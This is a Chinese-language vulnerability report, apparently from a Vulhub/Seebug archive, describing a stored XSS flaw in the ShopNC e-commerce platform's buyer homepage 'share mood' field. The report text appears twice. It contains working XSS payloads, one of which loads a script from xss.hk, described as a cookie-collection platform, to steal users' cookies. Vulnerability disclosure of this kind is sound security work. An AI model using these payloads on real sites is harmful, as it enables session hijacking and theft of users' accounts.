VULHUB ™

### 简要描述： shopnc存储型xss漏洞 ### 详细说明： shopnc版本测试http://www.shopnctest.com/c2c/2013/demo/ shopnc用户个人主页处存在存储型XSS，可以获取用户敏感cookie信息。 在买家首页，分享心情处 [<img src="https://images.seebug.org/upload/201404/03173903c99e54933326cd4599d0dcba3d10eff6.jpg" alt="a.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201404/03173903c99e54933326cd4599d0dcba3d10eff6.jpg) 测试代码为:`"><img src=2 onerror=alert(11)/><scriPt >alert(document.cookie)</scripT>// cookie收信平台 "><img src=2 onerror=alert(11)/><scriPt src=http://xss.hk/ytcXRW?1396447777>alert(document.cookie)</scripT>/` 如图 [<img src="https://images.seebug.org/upload/201404/031739162c88bf5de752ba0c97b0d105f2ad5e3f.jpg" alt="b.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201404/031739162c88bf5de752ba0c97b0d105f2ad5e3f.jpg) ### 漏洞证明： 如上描述

### 简要描述： shopnc存储型xss漏洞 ### 详细说明： shopnc版本测试http://www.shopnctest.com/c2c/2013/demo/ shopnc用户个人主页处存在存储型XSS，可以获取用户敏感cookie信息。 在买家首页，分享心情处 [<img src="https://images.seebug.org/upload/201404/03173903c99e54933326cd4599d0dcba3d10eff6.jpg" alt="a.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201404/03173903c99e54933326cd4599d0dcba3d10eff6.jpg) 测试代码为:`"><img src=2 onerror=alert(11)/><scriPt >alert(document.cookie)</scripT>// cookie收信平台 "><img src=2 onerror=alert(11)/><scriPt src=http://xss.hk/ytcXRW?1396447777>alert(document.cookie)</scripT>/` 如图 [<img src="https://images.seebug.org/upload/201404/031739162c88bf5de752ba0c97b0d105f2ad5e3f.jpg" alt="b.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201404/031739162c88bf5de752ba0c97b0d105f2ad5e3f.jpg) ### 漏洞证明： 如上描述